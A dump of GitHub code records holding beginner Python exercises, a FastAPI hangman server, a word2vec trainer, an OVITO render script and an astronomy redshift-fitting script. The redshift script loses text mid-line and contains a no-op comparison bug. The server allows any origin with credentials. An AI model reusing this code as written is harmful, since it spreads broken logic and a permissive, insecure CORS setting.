\"Scorpio\"\r\n    strengths = ScorpioStr\r\n    weaknesses = ScorpioWe\r\nelif user_month == \"November\" and user_day <= 21:\r\n    astrology_sign = \"Scorpio\"\r\n    strengths = ScorpioStr\r\n    weaknesses = ScorpioWe\r\nelif user_month == \"November\" and user_day >= 22:\r\n    astrology_sign = \"Sagittarius\"\r\n    strengths = SagittariusStr\r\n    weaknesses = SagittariusWe\r\nelif user_month == \"December\" and user_day <= 21:\r\n    astrology_sign = \"Sagittarius\"\r\n    strengths = SagittariusStr\r\n    weaknesses = SagittariusWe\r\nelif user_month == \"December\" and user_day >= 22:\r\n    astrology_sign = \"Capricorn\"\r\n    strengths = CapricornStr\r\n    weaknesses = CapricornWe\r\nelse: \r\n    print(\"enter a valid birthday please :)\")\r\n\r\n\r\nprint(\"your astrology sign is \" + astrology_sign + \"!!! \\nRead below for your strengths and weaknesses:\")\n# weaknesses and strengths based on the sign \n#Aries Taurus Gemini Cancer Leo Virgo Libra Scorpio Sagittarius Capricorn Aquarius Pisces\nprint(\"Strengths: \" + strengths)\nprint(\"Weaknesses: \" + weaknesses)\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n# -------------------------------------------- \n\n\t# Part 2: Next, we need to randomly select a response from 20 options.\n\n\t# Randomly select a number from 0 - 19 \n\t# Use that to select from the following responses:\n\t\t# 0 - It is certain.\n\t\t# 1 - It is decidedly so.\n\t\t# 2 - Without a doubt.\n\t\t# 3 - Yes - definitely.\n\t\t# 4 - You may rely on it.\n\t\t# 5 - As I see it, yes.\n\t\t# 6 - Most likely.\n\t\t# 7 - Outlook good.\n\t\t# 8 - Yes.\n\t\t# 9 - Signs point to yes.\n\t\t# 10 - Reply hazy, try again.\n\t\t# 11 - Ask again later.\n\t\t# 12 - Better not tell you now.\n\t\t# 13 - Cannot predict now.\n\t\t# 14 - Concentrate and ask again.\n\t\t# 15 - Don't count on it.\n\t\t# 16 - My reply is no.\n\t\t# 17 - My sources say no.\n\t\t# 18 - Outlook not so good.\n\t\t# 19 - Very doubtful.\n\n\t# Look up random.randint to see how you can use it to select a random number.\n\n
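\t# One possible sketch of Part 2, left as comments so the horoscope\n\t# program above keeps its behavior. It assumes the commented-out\n\t# \"import random\" at the top of this file is enabled, and only three\n\t# of the twenty responses are listed here.\n\t#\n\t# responses = [\"It is certain.\", \"Reply hazy, try again.\", \"Very doubtful.\"]\n\t# answer = responses[random.randint(0, len(responses) - 1)]\n\t# print(answer)\n\n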
 # -------------------------------------------- \n\n\n\n\n\n\n\n\n\n\n\n# -------------------------------------------- \n\n\t# Part 3: Customize it!\n\n\t# Select your own theme and use case and modify your code!\n\t\n# -------------------------------------------- \n\n","repo_name":"BrandonLaRose/TeamEdgeTerm0Python","sub_path":"conditional_game.py","file_name":"conditional_game.py","file_ext":"py","file_size_in_byte":8246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"23628390614","text":"from config import DB_URL, DBPaths\nfrom tortoise.contrib.fastapi import register_tortoise\nfrom fastapi import FastAPI\nfrom src.game.routers import ws_router\n\nfrom src.users.routers import (\n    fastapi_cookies,\n    fastapi_users,\n    SECRET,\n)\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.middleware.cors import CORSMiddleware\n\n\napp = FastAPI(\n    title='HangMan WebSockets',\n    description=\"API with WS for game HangMan\",\n    version=\"0.0.1\"\n)\n\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins='*',\n    allow_credentials=True,\n    allow_methods=['*'],\n    allow_headers=['*'],\n)\n\napp.include_router(\n    fastapi_cookies, prefix=\"/auth/jwt\", tags=[\"Auth\"]\n)\napp.include_router(\n    fastapi_users.get_register_router(), prefix=\"/auth\", tags=[\"Auth\"]\n)\napp.include_router(\n    fastapi_users.get_reset_password_router(SECRET),\n    prefix=\"/auth\", tags=[\"Auth\"],\n)\n\napp.include_router(fastapi_users.get_users_router(), prefix=\"/users\", tags=[\"Users\"])\n\napp.include_router(ws_router)\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n\nregister_tortoise(\n    app,\n    db_url=DB_URL,\n    modules={\"models\": DBPaths.all_paths},\n    generate_schemas=True,\n    add_exception_handlers=True,\n)\n","repo_name":"LucianDeveloper/HangmanWebSockets","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31980259509","text":"import numpy as np\nimport spacy\nfrom collections import Counter\nimport torch\nfrom sklearn.model_selection import train_test_split\nfrom A1P3_4 import Word2vecModel\nfrom tqdm import tqdm # For progress bars\nimport matplotlib.pyplot as plt\n\n
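# Module-level word->index vocabulary, apparently hard-coded to match\n# SmallSimpleCorpus.txt; train_word2vec below reads this global v2i directly\n# (prepare_texts can rebuild the same mapping from the corpus).\n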
v2i = {\n    'and': 0,\n    'hold': 1,\n    'dog': 2,\n    'cat': 3,\n    'rub': 4,\n    'a': 5,\n    'the': 6,\n    'can': 7,\n    'she': 8,\n    'he': 9,\n    'I': 10\n}\n\n\ndef prepare_texts(text): \n    # Get a callable object from spaCy that processes the text - lemmatizes and determines part of speech\n\n    nlp = spacy.load(\"en_core_web_sm\")\n    \n    # lemmatize the text, get part of speech, and remove spaces and punctuation\n    \n    lemmas = [tok.lemma_ for tok in nlp(text) if tok.pos_ not in [\"PUNCT\", \"SPACE\"]]\n    \n    # count the number of occurrences of each word in the vocabulary\n    \n    freqs = Counter() \n    for w in lemmas:\n        freqs[w] += 1\n    \n    vocab = list(freqs.items()) # List of (word, occurrence)\n    \n    vocab = sorted(vocab, key=lambda item: item[1], reverse=True) # Sort by decreasing frequency\n    # print(vocab)\n    \n    # Create word->index dictionary and index->word dictionary\n    \n    v2i = {v[0]:i for i,v in enumerate(vocab)}\n    i2v = {i:v[0] for i,v in enumerate(vocab)}\n    \n    return lemmas, v2i, i2v\n\n\ndef tokenize_and_preprocess_text(textlist, v2i, window=5):\n    X, Y = [], []\n    n_grams = (window - 1) // 2\n\n    for stc in textlist:\n        lemma, _, _ = prepare_texts(stc)\n        lemma = [v2i[i] for i in lemma]  # transfer to indices\n\n        for i, w in enumerate(lemma):\n            for n in range(1, n_grams + 1):\n                if i - n >= 0:\n                    X.append(w)\n                    Y.append(lemma[i - n])\n                if i + n < len(lemma):\n                    X.append(w)\n                    Y.append(lemma[i + n])\n\n    return np.array(X, dtype=int), np.array(Y, dtype=int)\n\n\ndef train_word2vec(textlist, window=5, embedding_size=2):\n    '''\n    Set up a model with Skip-gram (predict context with word)\n    textlist: a list of the strings\n    '''\n    # Create the training data\n    X, y = tokenize_and_preprocess_text(textlist, v2i, window) # moved to front for speed\n    print (X.shape, y.shape)\n\n    # Split the training data\n    \n    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, shuffle=True)\n    print(X_train.shape, X_test.shape, y_train.shape, y_test.shape)\n\n    # instantiate the network & set up the optimizer\n    \n    model = Word2vecModel(vocab_size=len(v2i.keys()), embedding_size=embedding_size)\n    device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n    model.to(device)\n\n    lr = 1e-3\n    epochs = 50\n    bs = 4\n    n_workers = 1\n    loss_fn = torch.nn.CrossEntropyLoss()\n    optimizer = torch.optim.Adam(params=model.parameters(), lr=lr)\n\n    # training loop\n    batches = torch.from_numpy(X_train).split(bs)\n    targets = torch.from_numpy(y_train).split(bs)\n\n    progress_bar = tqdm(range(epochs))\n\n    running_loss = []\n    running_val_loss = []\n\n    for epoch in range(epochs):\n        epoch_loss = 0\n        for center, context in zip(batches, targets):\n            center, context = center.to(device), context.to(device)\n            optimizer.zero_grad()\n            logits, e = model(x=center) # forward\n            loss = loss_fn(logits, context)\n            epoch_loss += loss.item()\n            loss.backward()\n            optimizer.step()\n\n        # validation targets must be torch tensors on the same device as the model\n        with torch.no_grad():\n            val_pred, _ = model(x=torch.from_numpy(X_test).to(device))\n            val_loss = loss_fn(val_pred, torch.from_numpy(y_test).to(device)).item()\n\n        progress_bar.update(1)\n        epoch_loss /= len(batches)\n        running_loss.append(epoch_loss)\n        running_val_loss.append(val_loss)\n\n    return model, running_loss, running_val_loss\n\n\nif __name__ == '__main__':\n    with open('SmallSimpleCorpus.txt') as f:\n        corpus = f.readline()\n    corpus = corpus.split('. 
') # separate sentences\n    network, tloss, vloss = train_word2vec(corpus)\n    embedding = network.embedding\n    \n    fig = plt.figure()\n    ax = fig.add_subplot(1, 1, 1)\n    ax.plot(tloss, 'r')  # training loss\n    ax.plot(vloss, 'b')  # validation loss\n    \n    \n    ","repo_name":"ephemer1s/ECE1786H-Assignments","sub_path":"a1/A1P3_5.py","file_name":"A1P3_5.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"1697030527","text":"#class=29\r\n\r\nprint(\"Welcome to the rollercoaster!\")\r\nheight=int(input(\"What is your height in cm? \\n\"))\r\n\r\nif height>=120:\r\n    print(\"You can ride the rollercoaster\\n\")\r\nelse:\r\n    print(\"Sorry, you have to grow taller before you can ride.\\n\")\r\n\r\n\r\n#class=30\r\n\r\n#modulo operation (remainder)\r\nprint(7%3)\r\nprint(\"Welcome to my world\\nLet's check whether a number is even or odd\")\r\nnum=int(input(\"Enter any number:-\"))\r\nif num%2==0:\r\n    print(\"This is an Even Number\")\r\nelif num%2!=0:\r\n    print(\"This is an Odd Number\")\r\nelse:\r\n    print(\"Bye Bye\")\r\n\r\n\r\n#class=31\r\n\r\nprint(\"Welcome to the rollercoaster!\")\r\nheight=int(input(\"What is your height in cm? \"))\r\n\r\nif height>=120:\r\n    print(\"You can ride the rollercoaster\")\r\n    age=int(input(\"What is your age? \"))\r\n    if age>=18:\r\n        print(\"Please pay $12.\")\r\n    elif 12<=age<=18:\r\n        print(\"Please pay $7\")\r\n    else:\r\n        print(\"Please pay $5\")\r\nelse:\r\n    print(\"Sorry, you have to grow taller before you can ride.\")\r\n\r\n\r\n#class=32\r\n\r\nheight=float(input(\"Enter your height in m: \"))\r\nweight=float(input(\"Enter your weight in kg: \"))\r\nbmi=round(weight/height**2, 2)\r\nif bmi<=18.5:\r\n    print(f\"Your BMI is {bmi}, you are underweight\")\r\nelif 18.5<=bmi<=25:\r\n    print(f\"Your BMI is {bmi}, you are a normal weight\")\r\nelif 25<=bmi<=30:\r\n    print(f\"Your BMI is {bmi}, you are overweight\")\r\nelif 30<=bmi<=35:\r\n    print(f\"Your BMI is {bmi}, you are obese\")\r\nelse:\r\n    print(f\"Your BMI is {bmi}, you are clinically obese\")\r\n\r\n\r\n#class=33\r\n\r\n#leap year\r\nyear=int(input(\"Which year do you want to check: \"))\r\nif year % 4==0:\r\n    if year%100==0:\r\n        if year%400==0:\r\n            print(\"Leap year\")\r\n        else:\r\n            print(\"Not leap year\")\r\n    else:\r\n        print(\"Leap year\")\r\nelse:\r\n    print(\"Not leap year\")\r\n\r\n\r\n#class=34\r\n\r\n\r\n#add photo price\r\nprint(\"Welcome to the rollercoaster!\")\r\nheight=int(input(\"What is your height in cm? \"))\r\nbill=0\r\n\r\nif height>=120:\r\n    print(\"You can ride the rollercoaster\")\r\n    age=int(input(\"What is your age? \"))\r\n    if age>=18:\r\n        bill=12\r\n        print(\"Adult tickets $12.\")\r\n    elif 12<=age<=18:\r\n        bill=7\r\n        print(\"Youth tickets $7\")\r\n    else:\r\n        bill=5\r\n        print(\"Child tickets $5\")\r\n\r\n    wants_photo=input(\"Do you want a photo taken? yes or no : \")\r\n    if wants_photo==\"yes\":\r\n        bill+=3\r\n\r\n    print(f\"Your final bill is {bill}\")\r\nelse:\r\n    print(\"Sorry, you have to grow taller before you can ride.\")\r\n\r\n\r\n#class=35\r\n\r\n#add extra bill price\r\nprint(\"Welcome to Python Pizza Deliveries!\")\r\npizza_size=input(\"What size pizza do you want? S, M or L : \")\r\nadd_pepperoni=input(\"Do you want pepperoni? yes or no : \")\r\nextra_cheese=input(\"Do you want extra cheese? yes or no : \")\r\n
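# Pricing used below: S $15 / M $20 / L $25; pepperoni +$2 on S, +$3 on M or L;\r\n# extra cheese +$1.\r\n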
bill=0\r\nif pizza_size==\"S\":\r\n    bill += 15\r\nelif pizza_size==\"M\":\r\n    bill += 20\r\nelif pizza_size==\"L\":\r\n    bill += 25\r\nelse:\r\n    bill+=25\r\n\r\nif add_pepperoni==\"yes\":\r\n    if pizza_size==\"S\":\r\n        bill+=2\r\n    elif pizza_size in (\"M\", \"L\"):\r\n        bill+=3\r\n    else:\r\n        bill+=3\r\n\r\nif extra_cheese==\"yes\":\r\n    bill+=1\r\n\r\nprint(f\"Your final bill is ${bill}\")\r\n\r\n\r\n#class=36\r\n\r\n#uses of logic\r\nprint(\"Welcome to the rollercoaster!\")\r\nheight=int(input(\"What is your height in cm? \"))\r\nbill=0\r\n\r\nif height>=120:\r\n    print(\"You can ride the rollercoaster\")\r\n    age=int(input(\"What is your age? \"))\r\n    if 18<=age<45:\r\n        bill=12\r\n        print(\"Adult tickets $12.\")\r\n    elif 12<=age<=18:\r\n        bill=7\r\n        print(\"Youth tickets $7\")\r\n    elif age>=45 and age<=55:\r\n        print(\"Everything is going to be ok. Have a free ride on us!\")\r\n    else:\r\n        bill=5\r\n        print(\"Child tickets $5\")\r\n\r\n    wants_photo=input(\"Do you want a photo taken? yes or no : \")\r\n    if wants_photo==\"yes\":\r\n        bill+=3\r\n\r\n    print(f\"Your final bill is {bill}\")\r\nelse:\r\n    print(\"Sorry, you have to grow taller before you can ride.\")\r\n\r\n\r\n#class=37\r\n\r\n#love calculator\r\nprint(\"Welcome to the love Calculator\")\r\nname1=input(\"What is your name? \\n\")\r\nname2=input(\"What is their name? \\n\")\r\n\r\ncombined_string=name1+name2\r\nlower_case_string=combined_string.lower()\r\n\r\nt=lower_case_string.count(\"t\")\r\nr=lower_case_string.count(\"r\")\r\nu=lower_case_string.count(\"u\")\r\ne=lower_case_string.count(\"e\")\r\n\r\ntrue= t+r+u+e\r\n\r\nl=lower_case_string.count(\"l\")\r\no=lower_case_string.count(\"o\")\r\nv=lower_case_string.count(\"v\")\r\ne=lower_case_string.count(\"e\")\r\n\r\nlove=l+o+v+e\r\n\r\nlove_score = int(str(true)+str(love))\r\n\r\nprint(love_score)\r\n\r\nif (love_score<10) or (love_score>90):\r\n    print(f\"Your love score is {love_score}, you go together like\")\r\nelif (love_score>=40) and (love_score<=50):\r\n    print(f\"Your score is {love_score}, you are alright together.\")\r\nelse: \r\n    print(f\"Your score is {love_score}\")\r\n\r\n\r\n#class=38\r\n\r\n#treasure island GAME\r\nprint(\"Welcome to treasure Island.\")\r\nprint(\"Your mission is to find the treasure.\")\r\nchoice1=input('You\\'re at a crossroad, where do you want to go? Type \"left\" or \"right\".').lower()\r\n\r\nif choice1==\"left\":\r\n    choice2=input('You\\'ve come to a lake. There is an island in the middle of the lake. Type \"wait\" to wait for a boat. Type \"swim\" to swim across.').lower()\r\n    if choice2==\"wait\":\r\n        choice3=input(\"You arrive at the island unharmed. There is a house with 3 doors: one red, one yellow and one blue. Which colour do you choose?\").lower()\r\n        if choice3==\"red\":\r\n            print('It\\'s a room full of fire. Game Over')\r\n        elif choice3==\"yellow\":\r\n            print(\"You found treasure! You Win!\")\r\n        elif choice3==\"blue\":\r\n            print(\"You enter a room of beasts. Game Over\")\r\n        else:\r\n            print('You chose a door that doesn\\'t exist. Game Over')\r\n    else:\r\n        print(\"You got attacked by an angry trout. Game Over.\")\r\nelse:\r\n    print(\" You fell into a hole. 
Game Over\")","repo_name":"Suraj8394/by-using-Python-to-made-some-project-and-game","sub_path":"day3class28,29,30,31,32,33,34,35,36,37,38.py","file_name":"day3class28,29,30,31,32,33,34,35,36,37,38.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28658679792","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nfrom collections import Counter\n\nprint(\"number of shoes\")\nX = int(input())# number of shoes\nsizes=list(map(int, input().split()))\nprint(\"number of customers\")\nn=int(input())\nsizes=Counter(sizes)\npr=0\n\nfor i in range (n):\n    sz,pz=map(int,input().split())\n    # sell the pair only if that size is still in stock\n    if sizes[sz]>0:\n        pr+=pz\n        sizes[sz]-=1\n\nprint(pr)\n","repo_name":"dattaprasadh/MLprograms","sub_path":"datta.py","file_name":"datta.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7647167867","text":"from ovito.io import import_file\nfilename=\"N100M100.data\"\npipeline=import_file(filename,atom_style=\"bond\")\n\ndata=pipeline.compute()\nmol=data.particles['Molecule Identifier']\nimport numpy as np\nnum_particles=mol.size\nmol_max=np.max(mol)\n\ndef color_rgb(i,max):\n    f=float(i)/float(max)\n    r=0\n    g=0\n    b=0\n    if f < 0.25:\n        r=1.0\n        g=4*f\n        b=0.0\n    elif f < 0.5: \n        r=1.0-4*(f-0.25)\n        g=1.0\n        b=0.0\n    elif f < 0.75:\n        r=0.0\n        g=1.0\n        b=4*(f-0.5)\n    else:\n        r=0.0\n        g=1.0-4*(f-0.75)\n        b=1.0\n    return [r,g,b]\n\ndef modify(frame,data):\n    color=data.particles_.create_property('Color')\n    for i in range(num_particles):\n        mol_i=mol[i]\n        color[i]=color_rgb(mol_i,mol_max)\n\npipeline.modifiers.append(modify)\npipeline.add_to_scene()\n\nfrom ovito.vis import ParticlesVis\nparticle_vis=pipeline.source.data.particles.vis\nparticle_vis.radius=0.4\n\nfrom ovito.vis import BondsVis\nbond_vis=pipeline.source.data.particles.bonds.vis\nbond_vis.width=0.6\n\ncell_vis=pipeline.source.data.cell.vis\ncell_vis.rendering_color=(1.0,1.0,1.0)\n\nfrom ovito.vis import CoordinateTripodOverlay\ntripod = CoordinateTripodOverlay()\ntripod.size = 0.07\ntripod.offset_x = 0.02\ntripod.offset_y = 0.02\n\n\nimport math\nfrom ovito.vis import Viewport\nvp = Viewport(type=Viewport.Type.Perspective, camera_dir=(1,2,-1))\nvp.zoom_all()\nvp.overlays.append(tripod)\nvp.render_image(size=(500,500),filename=\"figure.png\",background=(0,0,0))\n\n","repo_name":"t-murash/OVITO-PYTHON","sub_path":"03Color/color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"12386165167","text":"import sys, os, glob, time, warnings, gc\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.table import Table, vstack, hstack, join\nimport fitsio\nfrom astropy.io import fits\n\nimport evalSR\nimport importlib\nimportlib.reload(evalSR)\n\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import cauchy\n\ndatadir = '/global/cscratch1/sd/jiaxi/SHAM/catalog/'\ntask = sys.argv[1]\n# \"plot\" 'random_catalogue', 'lorentzian_random', 'voigt_random'\nTYPE = sys.argv[2]\n# 'LRG', 'ELG', 'QSO', 'BGS'\ncatapath = sys.argv[3]\n# repeats_final-targets; repeats_Ashley-guess(old)\nmode = sys.argv[4]\n# 'multiple-obs'; 'one-obs'; 'inter-obs'\ndz,z,zrsel,ggzsel = {'LRG':[],'ELG':[],'QSO':[],'BGS':[]},{'LRG':[],'ELG':[],'QSO':[],'BGS':[]},{'LRG':[],'ELG':[],'QSO':[],'BGS':[]},{'LRG':[],'ELG':[],'QSO':[],'BGS':[]}\n#-- fit a Gaussian\ndef gaussian(x,a,sigma,mu):\n    return 
a/np.sqrt(2*np.pi)/sigma*np.exp(-(x-mu)**2/(2*sigma**2))\ndef lorentzian(x,a,w,p):\n return a/(1+((x-p)*2/w)**2)\ndef pvoigt(x,a,sigma,mu,a1):\n w = sigma*2*np.sqrt(2*np.log(2))\n return gaussian(x,a,sigma,mu)+lorentzian(x,a1,w,mu)\n #return a1*np.convolve(gaussian(x,a,sigma,mu),lorentzian(x,a/np.pi*w,w,mu),mode='same')\ndef sampling(datalen):\n Nsample = datalen*5\n simu = []\n samples = []\n bins = np.arange(-500,501,5)\n BIN = (bins[1:]+bins[:-1])/2\n #import pdb;pdb.set_trace()\n norm = len(dv)\n dens,BINS,plot = plt.hist(dv, bins=bins, histtype='step')\n cQ = 1/len(BIN)*10\n #popt2, pcov21 = curve_fit(pvoigt,BIN,dens/norm,bounds=(np.array([0,0,-np.inf,0]),np.array([np.inf,1000,np.inf,np.inf])))\n #import pdb;pdb.set_trace()\n\n for i in range(Nsample):\n random = np.random.uniform(low=-maxdv,high=maxdv)\n value = np.interp(random,BIN,dens/norm)\n #value = 10*pvoigt(random,popt2[3]*np.pi*popt2[1],popt2[1],popt2[2],popt2[3])\n #import pdb;pdb.set_trace()\n sample = np.random.uniform(0,cQ)\n if samplezmin)\nsel &= tcomp['ZWARN'] == 0\ntcomp = tcomp[sel]\nprint('repetitive model:',mode)\nif mode == 'one-obs':\n dv = (tcomp['Z'] - tcomp['Z_TRUTH'])*299792./(1+tcomp['Z_TRUTH'])\n zerr = tcomp['ZERR']*299792./(1+tcomp['Z_TRUTH'])\n A,B = np.unique(tcomp['TARGETID'],return_index=True)\n dv = dv[B]\n zerr = zerr[B]\nelif mode == 'inter-obs':\n A = np.unique(tcomp['TARGETID'])\n tcomp['ZERR_TRUTH'] = np.zeros(len(tcomp))\n print(len(A))\n for a in A:\n tcomp[tcomp['TARGETID'] == a]['Z_TRUTH'] == tcomp[tcomp['TARGETID'] == a]['Z'][0]\n tcomp[tcomp['TARGETID'] == a]['ZERR_TRUTH'] == tcomp[tcomp['TARGETID'] == a]['ZERR'][0]\n dv = (tcomp['Z'] - tcomp['Z_TRUTH'])*299792./(1+tcomp['Z_TRUTH'])\n zerr = np.sqrt(tcomp['ZERR_TRUTH']**2+tcomp['ZERR']**2)*299792./(1+tcomp['Z_TRUTH']) \n zerr = zerr[dv!=0]\n dv = dv[dv!=0]\nelif mode =='multiple-obs':\n dv = (tcomp['Z'] - tcomp['Z_TRUTH'])*299792./(1+tcomp['Z_TRUTH'])\n zerr = tcomp['ZERR']*299792./(1+tcomp['Z_TRUTH'])\n \n\n#ztrue = tcomp['Z_TRUTH']*1\n#ztrue,dv,zerr = np.loadtxt('{}_deltav_{}_new.dat'.format(TYPE,zrange),unpack=True)\n\nif task == 'plot':\n print('delta v: fitting')\n for jseq in range(2):\n fig,ax = plt.subplots(1,1,figsize=(9,6))\n BIN = (bins[1:]+bins[:-1])/2\n #import pdb;pdb.set_trace()\n norm = len(dv)\n dens,BINS,plot = plt.hist(dv, bins=bins, histtype='step')\n \n popt, pcov = curve_fit(gaussian,BIN,dens) \n print('Gaussian finished')\n popt1, pcov1 = curve_fit(lorentzian,BIN,dens)\n print('Lorentzian finished')\n #popt2, pcov2 = curve_fit(pvoigt,BIN,dens,bounds=(np.array([0,0,-np.inf,0]),np.array([np.inf,1000,np.inf,np.inf])))\n #print('Voigt finished')\n \n \"\"\"\n # manual voigt realisation\n from lmfit.models import PseudoVoigtModel\n mod = PseudoVoigtModel()\n pars = mod.guess(dens, x=BIN)\n pars['fraction'].set(value=0.1, min=0, max=0.4)\n out = mod.fit(dens, pars, x=BIN)\n #print(out.fit_report(min_correl=0.25))\n plt.plot(BIN, out.best_fit,c='green',label='PseudoVoigt')# $p_0 = {:.1f} \\pm {:.1f}$, '.format(popt1[2],np.sqrt(np.diag(pcov1))[2])+r'w/(2$\\sqrt{2ln2})$'+' = ${:.1f} \\pm {:.1f}$'.format(popt1[1]/2/np.sqrt(2*np.log(2)),np.sqrt(np.diag(pcov1))[1]/2/np.sqrt(2*np.log(2))))\n \"\"\"\n \n plt.plot(BIN, gaussian(BIN,*popt),c='r',label=r'Gaussian $\\sigma = {:.1f} \\pm {:.1f}, \\chi^2/dof={:.1}/{}$'.format(popt[1],np.sqrt(np.diag(pcov))[1],sum((dens- gaussian(BIN,*popt))**2),len(dens)-3)) # $\\mu = {:.1f} \\pm {:.1f}, popt[2],np.sqrt(np.diag(pcov))[2], \n plt.plot(BIN, lorentzian(BIN,*popt1),c='k',label='Lorentzian 
w/(2$\\sqrt{2ln2})$'+' = ${:.1f} \\pm {:.1f}, \\chi^2/dof={:.1}/{}$'.format(popt1[1]/2/np.sqrt(2*np.log(2)),np.sqrt(np.diag(pcov1))[1]/2/np.sqrt(2*np.log(2)),sum((dens- lorentzian(BIN,*popt1))**2),len(dens)-3)) #$p_0 = {:.1f} \\pm {:.1f}$, '.format(popt1[2],np.sqrt(np.diag(pcov1))[2])+r', \n #plt.plot(BIN, pvoigt(BIN,*popt2),c='g',label=r'PseudoVoigt Gaussian $\\sigma = {:.1f} \\pm {:.1f}, \\chi^2/dof={:.1}/{}$'.format(popt2[1],np.sqrt(np.diag(pcov2))[1],sum((dens- pvoigt(BIN,*popt2))**2),len(dens)-3)) # $\\mu = {:.1f} \\pm {:.1f}, popt2[2],np.sqrt(np.diag(pcov2))[2], \n outliern = len(dv[(dv>-1000)&(dv<-maxdv)])\n outlierp = len(dv[(dv<1000)&(dv>maxdv)])\n plt.scatter(-maxdv,outliern,c='b',label='outliers')\n plt.scatter(maxdv,outlierp,c='b')\n plt.title(TYPE+' dv histogram ,stdev = {:.1f} km/s, {:.1f}% of outliers'.format(np.std(dv),(outliern+outlierp)/norm*100))\n ax.set_xlim(-maxdv-5,maxdv+5)\n if jseq ==0:\n log = 'lin'\n plt.ylim(0,1.8*max(dens))\n else:\n log = 'log'\n plt.ylim(1e-1,30*max(dens))\n plt.yscale('log')\n ax.set_xlabel('$\\Delta$ v (km/s)')\n ax.set_ylabel('counts')\n ax.grid(True)\n plt.legend(loc=2)\n plt.savefig('{}/{}_deltav_hist_std{:.1f}_{}_maxdv{}-{}_new.png'.format(catapath,TYPE,np.std(dv),zrange,maxdv,log))\n plt.close()\n \n print('{} in {} has {} pairs, fitting results are:'.format(TYPE,zrange,len(dv)))\n print('mu = {:.1f},sigma = {:.1f},chi2 = {:.1}'.format(popt[2],popt[1],sum((dens-gaussian(BIN,*popt))**2)))\n #print('abs<100 chi2 = {:.1}, abs>100 chi2 = {:.1}'.format(sum((dens[abs(BIN)<100]-gaussian(BIN,*popt)[abs(BIN)<100])**2),sum((dens[abs(BIN)>=100]-gaussian(BIN,*popt)[abs(BIN)>=100])**2)))\n print('lorentizan p0 = {:.1f}, sigma = {:.1f}, chi2 = {:.2}'.format(popt1[2],popt1[1]/np.sqrt(2*np.log(2))/2,sum((dens-lorentzian(BIN,*popt1))**2)))\n print('abs<100 chi2 = {:.1}, abs>100 chi2 = {:.1f}'.format(sum((dens[abs(BIN)<100]-lorentzian(BIN,*popt1)[abs(BIN)<100])**2),sum((dens[abs(BIN)>=100]-lorentzian(BIN,*popt1)[abs(BIN)>=100])**2)))\n #print('voigt mu = {:.1f}, sigma = {:.1f}, chi2={:.2}'.format(popt2[2],popt2[1],sum((dens-pvoigt(BIN,*popt2))**2)))\n #print('abs<100 chi2 = {:.1}, abs>100 chi2 = {:.1f}'.format(sum((dens[abs(BIN)<100]-pvoigt(BIN,*popt2)[abs(BIN)<100])**2),sum((dens[abs(BIN)>=100]-pvoigt(BIN,*popt2)[abs(BIN)>=100])**2)))\n print('stdev = ',np.std(dv))\n\n #-- fit a Gaussian for zerr/Delta v\n ratios = np.linspace(-10,10,101)\n ratio = (ratios[1:]+ratios[:-1])/2\n ratiodens,ratiobin = np.histogram(dv/zerr,ratios)\n #ratiodens = ratiodens/sum(ratiodens)\n\n popt3, pcov3 = curve_fit(gaussian,ratio,ratiodens)\n res2 = gaussian(ratio,*popt3)-ratiodens\n\n popt4, pcov4 = curve_fit(lorentzian,ratio,ratiodens)\n res3 = lorentzian(ratio,*popt4)-ratiodens\n #import pdb;pdb.set_trace()\n plt.figure(figsize=(8,6))\n plt.scatter(ratio,ratiodens)\n plt.scatter(ratio,ratiodens,color='k')\n plt.plot(ratio, gaussian(ratio,*popt3), label=r'Gaussian $\\sigma = {0:.1f}\\pm{{{1:.2f}}}$, $\\chi^2$ /dof = {2:.1}/{3:}'.format(popt3[1],np.sqrt(np.diag(pcov3))[1],sum(res2**2),len(res2)))\n plt.plot(ratio, lorentzian(ratio,*popt4), label = 'Lorentzian w/(2$\\sqrt{2ln2})$'+' = ${:.1f} \\pm {:.1f}, \\chi^2/dof={:.1}/{}$'.format(popt4[1]/2/np.sqrt(2*np.log(2)),np.sqrt(np.diag(pcov4))[1]/2/np.sqrt(2*np.log(2)),sum(res3**2),len(res3)))\n plt.xlabel(r'$\\Delta v$/ZERR')\n plt.ylabel('counts')\n plt.legend(loc=1)\n plt.ylim(0,max(ratiodens)*1.3)\n plt.title(TYPE+' dv/ZERR at {}1000])>0:\n random_lorentzian[abs(random_lorentzian)>1000] = cauchy.rvs(loc=0, scale=gamma, size 
